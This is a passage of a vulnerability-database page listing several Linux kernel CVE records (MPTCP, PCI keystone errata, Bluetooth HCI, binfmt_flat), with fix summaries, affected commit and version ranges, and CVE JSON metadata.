        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/mptcp/pm_netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "35b31f5549ede4070566b949781e83495906b43d",
              "status": "affected",
              "version": "d0876b2284cf8b34dd214b2d0aa21071c345da59",
              "versionType": "git"
            },
            {
              "lessThan": "85b866e4c4e63a1d7afb58f1e24273caad03d0b7",
              "status": "affected",
              "version": "d0876b2284cf8b34dd214b2d0aa21071c345da59",
              "versionType": "git"
            },
            {
              "lessThan": "d20bf2c96d7ffd171299b32f562f70e5bf5dc608",
              "status": "affected",
              "version": "d0876b2284cf8b34dd214b2d0aa21071c345da59",
              "versionType": "git"
            },
            {
              "lessThan": "2060f1efab370b496c4903b840844ecaff324c3c",
              "status": "affected",
              "version": "d0876b2284cf8b34dd214b2d0aa21071c345da59",
              "versionType": "git"
            },
            {
              "lessThan": "1c1f721375989579e46741f59523e39ec9b2a9bd",
              "status": "affected",
              "version": "d0876b2284cf8b34dd214b2d0aa21071c345da59",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/mptcp/pm_netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: pm: only decrement add_addr_accepted for MPJ req\n\nAdding the following warning ...\n\n  WARN_ON_ONCE(msk-\u003epm.add_addr_accepted == 0)\n\n... before decrementing the add_addr_accepted counter helped to find a\nbug when running the \"remove single subflow\" subtest from the\nmptcp_join.sh selftest.\n\nRemoving a \u0027subflow\u0027 endpoint will first trigger a RM_ADDR, then the\nsubflow closure. Before this patch, and upon the reception of the\nRM_ADDR, the other peer will then try to decrement this\nadd_addr_accepted. That\u0027s not correct because the attached subflows have\nnot been created upon the reception of an ADD_ADDR.\n\nA way to solve that is to decrement the counter only if the attached\nsubflow was an MP_JOIN to a remote id that was not 0, and initiated by\nthe host receiving the RM_ADDR."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:56.375Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/35b31f5549ede4070566b949781e83495906b43d"
        },
        {
          "url": "https://git.kernel.org/stable/c/85b866e4c4e63a1d7afb58f1e24273caad03d0b7"
        },
        {
          "url": "https://git.kernel.org/stable/c/d20bf2c96d7ffd171299b32f562f70e5bf5dc608"
        },
        {
          "url": "https://git.kernel.org/stable/c/2060f1efab370b496c4903b840844ecaff324c3c"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c1f721375989579e46741f59523e39ec9b2a9bd"
        }
      ],
      "title": "mptcp: pm: only decrement add_addr_accepted for MPJ req",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45009",
    "datePublished": "2024-09-11T15:13:47.719Z",
    "dateReserved": "2024-08-21T05:34:56.679Z",
    "dateUpdated": "2025-11-03T22:15:15.298Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-47667 (GCVE-0-2024-47667)

Vulnerability from cvelistv5 – Published: 2024-10-09 14:13 – Updated: 2026-01-05 10:53

Title

PCI: keystone: Add workaround for Errata #i2037 (AM65x SR 1.0)

Summary

In the Linux kernel, the following vulnerability has been resolved: PCI: keystone: Add workaround for Errata #i2037 (AM65x SR 1.0) Errata #i2037 in AM65x/DRA80xM Processors Silicon Revision 1.0 (SPRZ452D_July 2018_Revised December 2019 [1]) mentions when an inbound PCIe TLP spans more than two internal AXI 128-byte bursts, the bus may corrupt the packet payload and the corrupt data may cause associated applications or the processor to hang. The workaround for Errata #i2037 is to limit the maximum read request size and maximum payload size to 128 bytes. Add workaround for Errata #i2037 here. The errata and workaround is applicable only to AM65x SR 1.0 and later versions of the silicon will have this fixed. [1] -> https://www.ti.com/lit/er/sprz452i/sprz452i.pdf

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cfb006e185f64edbb…
	https://git.kernel.org/stable/c/ebbdbbc580c1695de…
	https://git.kernel.org/stable/c/135843c351c08df72…
	https://git.kernel.org/stable/c/af218c803fe298ddf…
	https://git.kernel.org/stable/c/576d0fb6f8d4bd469…
	https://git.kernel.org/stable/c/dd47051c76c8acd8c…
	https://git.kernel.org/stable/c/86f271f22bbb63914…

Impacted products

Vendor

Product

Version

Linux

Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < cfb006e185f64edbbdf7869eac352442bc76b8f6 (git)
Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < ebbdbbc580c1695dec283d0ba6448729dc993246 (git)
Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < 135843c351c08df72bdd4b4ebea53c8052a76881 (git)
Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < af218c803fe298ddf00abef331aa526b20d7ea61 (git)
Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < 576d0fb6f8d4bd4695e70eee173a1b9c7bae9572 (git)
Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < dd47051c76c8acd8cb983f01b4d1265da29cb66a (git)
Affected: 18b0415bc802a8bab5dedba5ae2757e83259e6ee , < 86f271f22bbb6391410a07e08d6ca3757fda01fa (git)

Linux

Affected: 5.2
Unaffected: 0 , < 5.2 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-47667",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-10T13:21:25.873788Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-10T13:21:40.905Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:20:31.801Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/controller/dwc/pci-keystone.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cfb006e185f64edbbdf7869eac352442bc76b8f6",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            },
            {
              "lessThan": "ebbdbbc580c1695dec283d0ba6448729dc993246",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            },
            {
              "lessThan": "135843c351c08df72bdd4b4ebea53c8052a76881",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            },
            {
              "lessThan": "af218c803fe298ddf00abef331aa526b20d7ea61",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            },
            {
              "lessThan": "576d0fb6f8d4bd4695e70eee173a1b9c7bae9572",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            },
            {
              "lessThan": "dd47051c76c8acd8cb983f01b4d1265da29cb66a",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            },
            {
              "lessThan": "86f271f22bbb6391410a07e08d6ca3757fda01fa",
              "status": "affected",
              "version": "18b0415bc802a8bab5dedba5ae2757e83259e6ee",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/controller/dwc/pci-keystone.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.2"
            },
            {
              "lessThan": "5.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: keystone: Add workaround for Errata #i2037 (AM65x SR 1.0)\n\nErrata #i2037 in AM65x/DRA80xM Processors Silicon Revision 1.0\n(SPRZ452D_July 2018_Revised December 2019 [1]) mentions when an\ninbound PCIe TLP spans more than two internal AXI 128-byte bursts,\nthe bus may corrupt the packet payload and the corrupt data may\ncause associated applications or the processor to hang.\n\nThe workaround for Errata #i2037 is to limit the maximum read\nrequest size and maximum payload size to 128 bytes. Add workaround\nfor Errata #i2037 here.\n\nThe errata and workaround is applicable only to AM65x SR 1.0 and\nlater versions of the silicon will have this fixed.\n\n[1] -\u003e https://www.ti.com/lit/er/sprz452i/sprz452i.pdf"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:53:50.473Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cfb006e185f64edbbdf7869eac352442bc76b8f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/ebbdbbc580c1695dec283d0ba6448729dc993246"
        },
        {
          "url": "https://git.kernel.org/stable/c/135843c351c08df72bdd4b4ebea53c8052a76881"
        },
        {
          "url": "https://git.kernel.org/stable/c/af218c803fe298ddf00abef331aa526b20d7ea61"
        },
        {
          "url": "https://git.kernel.org/stable/c/576d0fb6f8d4bd4695e70eee173a1b9c7bae9572"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd47051c76c8acd8cb983f01b4d1265da29cb66a"
        },
        {
          "url": "https://git.kernel.org/stable/c/86f271f22bbb6391410a07e08d6ca3757fda01fa"
        }
      ],
      "title": "PCI: keystone: Add workaround for Errata #i2037 (AM65x SR 1.0)",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-47667",
    "datePublished": "2024-10-09T14:13:59.522Z",
    "dateReserved": "2024-09-30T16:00:12.936Z",
    "dateUpdated": "2026-01-05T10:53:50.473Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42132 (GCVE-0-2024-42132)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-04 12:57

Title

bluetooth/hci: disallow setting handle bigger than HCI_CONN_HANDLE_MAX

Summary

In the Linux kernel, the following vulnerability has been resolved: bluetooth/hci: disallow setting handle bigger than HCI_CONN_HANDLE_MAX Syzbot hit warning in hci_conn_del() caused by freeing handle that was not allocated using ida allocator. This is caused by handle bigger than HCI_CONN_HANDLE_MAX passed by hci_le_big_sync_established_evt(), which makes code think it's unset connection. Add same check for handle upper bound as in hci_conn_set_handle() to prevent warning.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4970e48f83dbd21d2…
	https://git.kernel.org/stable/c/d311036696fed7783…
	https://git.kernel.org/stable/c/1cc18c2ab2e8c54c3…

Impacted products

Vendor

Product

Version

Linux

Affected: 84cb0143fb8a03bf941c7aaedd56c938c99dafad , < 4970e48f83dbd21d2a6a7cdaaafc2a71f7f45dc4 (git)
Affected: 181a42edddf51d5d9697ecdf365d72ebeab5afb0 , < d311036696fed778301d08a71a4bef737b86d8c5 (git)
Affected: 181a42edddf51d5d9697ecdf365d72ebeab5afb0 , < 1cc18c2ab2e8c54c355ea7c0423a636e415a0c23 (git)
Affected: e9f708beada55426c8d678e2f46af659eb5bf4f0 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:31.923Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4970e48f83dbd21d2a6a7cdaaafc2a71f7f45dc4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d311036696fed778301d08a71a4bef737b86d8c5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1cc18c2ab2e8c54c355ea7c0423a636e415a0c23"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42132",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:22.191923Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:36.401Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_conn.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4970e48f83dbd21d2a6a7cdaaafc2a71f7f45dc4",
              "status": "affected",
              "version": "84cb0143fb8a03bf941c7aaedd56c938c99dafad",
              "versionType": "git"
            },
            {
              "lessThan": "d311036696fed778301d08a71a4bef737b86d8c5",
              "status": "affected",
              "version": "181a42edddf51d5d9697ecdf365d72ebeab5afb0",
              "versionType": "git"
            },
            {
              "lessThan": "1cc18c2ab2e8c54c355ea7c0423a636e415a0c23",
              "status": "affected",
              "version": "181a42edddf51d5d9697ecdf365d72ebeab5afb0",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "e9f708beada55426c8d678e2f46af659eb5bf4f0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_conn.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.5.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbluetooth/hci: disallow setting handle bigger than HCI_CONN_HANDLE_MAX\n\nSyzbot hit warning in hci_conn_del() caused by freeing handle that was\nnot allocated using ida allocator.\n\nThis is caused by handle bigger than HCI_CONN_HANDLE_MAX passed by\nhci_le_big_sync_established_evt(), which makes code think it\u0027s unset\nconnection.\n\nAdd same check for handle upper bound as in hci_conn_set_handle() to\nprevent warning."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:42.567Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4970e48f83dbd21d2a6a7cdaaafc2a71f7f45dc4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d311036696fed778301d08a71a4bef737b86d8c5"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cc18c2ab2e8c54c355ea7c0423a636e415a0c23"
        }
      ],
      "title": "bluetooth/hci: disallow setting handle bigger than HCI_CONN_HANDLE_MAX",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42132",
    "datePublished": "2024-07-30T07:46:27.684Z",
    "dateReserved": "2024-07-29T15:50:41.186Z",
    "dateUpdated": "2025-05-04T12:57:42.567Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44966 (GCVE-0-2024-44966)

Vulnerability from cvelistv5 – Published: 2024-09-04 18:38 – Updated: 2025-11-03 22:14

Title

binfmt_flat: Fix corruption when not offsetting data start

Summary

In the Linux kernel, the following vulnerability has been resolved: binfmt_flat: Fix corruption when not offsetting data start Commit 04d82a6d0881 ("binfmt_flat: allow not offsetting data start") introduced a RISC-V specific variant of the FLAT format which does not allocate any space for the (obsolete) array of shared library pointers. However, it did not disable the code which initializes the array, resulting in the corruption of sizeof(long) bytes before the DATA segment, generally the end of the TEXT segment. Introduce MAX_SHARED_LIBS_UPDATE which depends on the state of CONFIG_BINFMT_FLAT_NO_DATA_START_OFFSET to guard the initialization of the shared library pointer region so that it will only be initialized if space is reserved for it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3a684499261d0f7ed…
	https://git.kernel.org/stable/c/af65d5383854cc3f1…
	https://git.kernel.org/stable/c/49df34d2b7da9e57c…
	https://git.kernel.org/stable/c/9350ba06ee61db392…
	https://git.kernel.org/stable/c/3eb3cd5992f7a0c37…

Impacted products

Vendor

Product

Version

Linux

Affected: 04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8 , < 3a684499261d0f7ed5ee72793025c88c2276809c (git)
Affected: 04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8 , < af65d5383854cc3f172a7d0843b628758bf462c8 (git)
Affected: 04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8 , < 49df34d2b7da9e57c839555a2f7877291ce45ad1 (git)
Affected: 04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8 , < 9350ba06ee61db392c486716ac68ecc20e030f7c (git)
Affected: 04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8 , < 3eb3cd5992f7a0c37edc8d05b4c38c98758d8671 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.106 , ≤ 6.1.* (semver)
Unaffected: 6.6.47 , ≤ 6.6.* (semver)
Unaffected: 6.10.6 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44966",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:39:30.735328Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:35.153Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:13.583Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/binfmt_flat.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3a684499261d0f7ed5ee72793025c88c2276809c",
              "status": "affected",
              "version": "04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8",
              "versionType": "git"
            },
            {
              "lessThan": "af65d5383854cc3f172a7d0843b628758bf462c8",
              "status": "affected",
              "version": "04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8",
              "versionType": "git"
            },
            {
              "lessThan": "49df34d2b7da9e57c839555a2f7877291ce45ad1",
              "status": "affected",
              "version": "04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8",
              "versionType": "git"
            },
            {
              "lessThan": "9350ba06ee61db392c486716ac68ecc20e030f7c",
              "status": "affected",
              "version": "04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8",
              "versionType": "git"
            },
            {
              "lessThan": "3eb3cd5992f7a0c37edc8d05b4c38c98758d8671",
              "status": "affected",
              "version": "04d82a6d0881ef1ab1e9f66f10805177ee2fb1e8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/binfmt_flat.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.106",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.47",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.106",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.47",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.6",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
